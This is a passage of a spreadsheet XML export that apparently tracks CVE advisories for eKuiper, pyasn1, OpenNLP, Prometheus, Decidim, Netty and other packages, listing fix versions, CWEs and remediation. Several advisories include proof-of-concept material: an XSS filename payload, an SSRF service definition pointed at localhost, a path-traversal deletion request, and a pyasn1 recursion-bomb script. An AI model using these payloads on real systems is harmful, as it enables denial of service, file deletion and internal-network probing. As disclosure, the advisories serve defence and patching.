1. Create an external service JSON definition with a filename containing an XSS payload, e.g. `&lt;iframe src="javascript:alert`1337`"&gt;.json` inside a ZIP archive.
2. In external service creation, upload the ZIP and provide the matching service name: `&lt;iframe src="javascript:alert`1337`"&gt;`.
3. Upon service registration, the unescaped name executes when rendered in the UI context.
### Impact
Self-XSS / Stored XSS leading to potential session token leakage or unauthorized actions in the context of the affected user's browser session.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.0**: Strict alphanumeric identifier validation (`validate.ValidateID`) is now enforced on all external service creation and update endpoints, rejecting invalid characters.
### Workarounds
- Protect eKuiper management endpoints (`POST /services`) with authentication and network-level firewalls.
### Credits
- Reported by Alexey Kosmachev, Bi.Zone (@TheMostKnown)</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24978</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24979</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>### Summary
Server-side request forgery (SSRF) vulnerability in eKuiper allows an attacker with permissions to register external services or create rules to induce the eKuiper server to make requests to unintended network locations, such as internal services, loopback interfaces (localhost), or cloud metadata endpoints.
### Details
Prior to v2.4.0, eKuiper external service registrations and HTTP invocations did not validate destination IP addresses. An attacker with access to the eKuiper management API could register an external service pointing to an internal address (such as `http://127.0.0.1:9081` or other internal network services) and trigger queries using service functions (e.g. `SELECT tsschemaless(...) FROM demo`). This allows probing internal networks, leaking sensitive information (such as internal endpoints/credentials), or interacting with internal APIs accessible to the eKuiper host.
### PoC
1. Create an external service with an address pointing to an internal network / localhost:
```json
{
  "interfaces": {
    "tsschemaless": {
      "address": "http://127.0.0.1:9081",
      "protocol": "rest",
      "options": {
        "insecureSkipVerify": true,
        "headers": {
          "Accept-Charset": "utf-8"
        }
      },
      "schemaless": true
    }
  }
}
```
2. Load it to eKuiper and create a rule invoking it, e.g.: `SELECT tsschemaless("get", "/metadata/sources/yaml/mqtt", *) FROM demo`.
3. Run the rule. When data flows through the stream, the response from the internal service is retrieved and can be routed to an external sink or inspected.
### Impact
Server-Side Request Forgery (SSRF) allowing unauthorized access / probing of internal network services.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.0**: Starting with v2.4.0, SSRF protection (`httpx.GetSSRFDialContext`) is enabled by default across HTTP clients, blocking requests to private, loopback, link-local, multicast, and unspecified IP addresses.
### Workarounds (for versions &lt; 2.4.0)
If unable to upgrade immediately:
1. **Restrict Management API Access**: Restrict access to the eKuiper REST API (port 9081) and CLI using network firewalls, reverse proxies, and authentication so only trusted administrators can create or update services and rules.
2. **Egress Network Filtering**: Use firewall / iptables rules or container network isolation to block outbound requests from eKuiper to private subnets, loopback addresses, and cloud metadata endpoints (`169.254.169.254`).
3. **Audit Service Definitions**: Regularly review registered external services (`GET /services` or `bin/kuiper show services`) to verify target hosts.
### Notes for Users Upgrading to &gt;= 2.4.0
- In v2.4.0 and later, `basic.enablePrivateNet` in `kuiper.yaml` defaults to `false` (blocking private network access).
- If a developer's deployment legitimately requires eKuiper to communicate with internal REST services or private networks, they can explicitly opt in by setting `basic.enablePrivateNet: true` (or via environment variable `KUIPER__BASIC__ENABLEPRIVATENET=true`). Ensure eKuiper's API is protected before enabling this setting.
Reported by Alexey Kosmachev, Bi.Zone</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24979</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-58363</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>2.4.1</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>### Summary
A path traversal vulnerability in eKuiper's administrative management endpoints allows privileged users or attackers with access to management APIs to delete arbitrary files or directories on the host system.
### Details
In `internal/plugin/native/manager.go`, the plugin installation endpoint (`POST /plugins/*`) constructs a temporary directory path by directly joining user-supplied resource names (`name`) without sufficient sanitization. Supplying path traversal sequences (such as `../../...`) causes the deferred cleanup operation (`os.RemoveAll`) to target arbitrary directories outside the intended plugin directory.
A related issue in configuration and rule lifecycle management where unvalidated rule identifiers could influence file deletion paths was also addressed by introducing unified identifier and file name validation.
### PoC
1. Target file deletion via plugin installation endpoint:
```http
POST /plugins/sources HTTP/1.1
Host: 127.0.0.1:9081
Content-Type: application/json
{
  "name": "../../../../../tmp/target.txt",
  "file": "http://example.com/plugin.zip",
  "shellParas": [],
  "functions": []
}
```
2. When the request finishes, `/tmp/target.txt` is removed by `os.RemoveAll`.
### Impact
An attacker with access to eKuiper management APIs can cause arbitrary file or directory deletion, potentially leading to denial of service or disruption of the host environment. This vulnerability provides a delete-only capability and does not permit arbitrary file creation, modification, or code execution.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.1**: Input validation (`validate.ValidateID`) and file path validation (`path.VerifyFileName`) have been enforced across management endpoints.
### Workarounds
- Restrict network access to eKuiper management port (`9081`) via authentication, reverse proxies, and firewall rules.
- Run eKuiper with a dedicated non-root user account to limit file system deletion permissions.
### Credits
- @kosmosec
- @arpitjain099</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-58363</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30922</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>pip:pyasn1</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>0.6.3</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.
### Details
The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:
1. `indefLenValueDecoder` (Line 998):
```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```
This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.
2. `valueDecoder` (Lines 786 and 907):
```for component in decodeFun(substrate, componentType, **options):```
This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.
4. `_decodeComponentsSchemaless` (Line 661):
```for component in decodeFun(substrate, **options):```
This method handles decoding when no schema is provided.
In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.
### PoC
```
import sys
from pyasn1.codec.ber import decoder
sys.setrecursionlimit(100000)
print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80' 
payload = chunk * depth
print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")
try:
    decoder.decode(payload)
except RecursionError:
    print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
    print("[!] Crashed: Out of Memory")
except Exception as e:
    print(f"[!] Crashed: {e}")
```
```
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
```
### Impact
- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (&lt;100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (&lt;200KB) can consume hundreds of megabytes of RAM or exhaust the stack.
### Credits
Vulnerability discovered by Kevin Tu of TMIR at ByteDance.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30922</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42027</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.opennlp:opennlp-tools</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>1.9.5, 2.5.9, 3.0.0-M3</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr"/>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Versions Affected: before 1.9.5, before 2.5.9, before 3.0.0-M3
Description: 
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. 
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. 
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation: 
  * 1.x users should upgrade to 1.9.5.
  *  2.x users should upgrade to 2.5.9. 
  *  3.x users should upgrade to 3.0.0-M3. 
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. 
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42027</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42151</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="inlineStr"/>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>go:github.com/prometheus/prometheus</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>0.311.3</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr"/>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-256, CWE-312</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>### Impact
Users who use Azure AD remote write with OAuth authentication are impacted.
The `client_secret` field in the Azure AD remote write OAuth configuration (`storage/remote/azuread`) was typed as `string` instead of `Secret`. Prometheus redacts fields of type `Secret` when serving the configuration via the `/-/config` HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint.
### Patches
The problem has been patched by changing `ClientSecret` in `OAuthConfig` to `Secret`. Users should upgrade to 3.11.3 or 3.5.3 LTS.
### Workarounds
Users  who can not upgrade can switch to Managed Identity or Workload Identity authentication for Azure AD remote write, which do not involve a client secret.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42151</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44282</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>rubygems:decidim-elections</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>0.32.0</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr"/>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>## Description
A low-privilege process-scoped admin who can manage elections can store arbitrary HTML in the question statement/body without sanitization, and the public elections UI renders that value unsafely.
## Technical description
This stored XSS appears because election question titles are rendered as trusted HTML instead of sanitized text. The election question editor stores `question.body` as a normal translatable string, and the public helper `question_title` returns that value with `html_safe` and no sanitization boundary, so any user who can edit election questions can persist markup or script-bearing payloads that later render on public election pages.
&lt;img width="1506" height="1285" alt="decidim-election-01" src="https://github.com/user-attachments/assets/2e17f396-10f9-4423-bb97-5badbdb20d21" /&gt;
&lt;img width="1540" height="657" alt="decidim-election-02" src="https://github.com/user-attachments/assets/178adb7b-d00e-4b5d-9237-f391e523973f" /&gt;
### Impact
A low-privilege process-scoped admin or other election editor with question-management rights can persist JavaScript that executes in visitor's browsers on public election pages and voting booth screens.
### Patches
See https://github.com/decidim/decidim/pull/16659
### Workarounds
Developers should review their implementation's administrator accesses and not give access to untrustworthy users
### Resources
OWASP XSS Injection
### Credits
This issue was discovered in a security audit organized by the [Decidim Association](https://decidim.org) and made by [Radically Open Security](https://www.radicallyopensecurity.com/) against Decidim financed by [NGI](https://ngi.eu/).</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44282</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45674</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="inlineStr"/>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-resolver-dns</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr"/>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>### Summary
Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses.
### Details
In `io.netty.resolver.dns.DnsResolveContext#buildAliasMap`, the resolver processes the ANSWER section of a DNS response and blindly caches all CNAME records it finds.
According to https://datatracker.ietf.org/doc/html/rfc5452#section-6 
```
Care must be taken to only accept
   data if it is known that the originator is authoritative for the
   QNAME or a parent of the QNAME.
   One very simple way to achieve this is to only accept data if it is
   part of the domain for which the query was intended.
```
### Impact
DNS Cache Poisoning (Bailiwick Bypass). Any application using Netty's DNS resolver is impacted.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45674</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47691</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="inlineStr"/>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-resolver-dns</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr"/>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>### Summary
Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`).
### Details
In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName.
This means if the resolver queries evil.co.uk., it will accept an NS record claiming authority over co.uk.. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key (co.uk.). This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under co.uk..
The `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#cache` method only prevents caching if the record is for the root zone (dots == 1).
### Impact
DNS Cache Poisoning. Any application using Netty's DNS resolver is impacted.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47691</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50024</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>pip:githacker</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>1.1.8</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr"/>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R25"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S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50024</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54529</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>pip:sqladmin</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>0.27.1</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr"/>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-200, CWE-248, CWE-639</t>
        </is>
      </c>
      <c r="R26"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S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54529</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55073</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>pip:weasyprint</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>70.0</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr"/>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R27"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S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55073</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56341</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="inlineStr"/>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>composer:wwbn/avideo</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr"/>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>## Summary
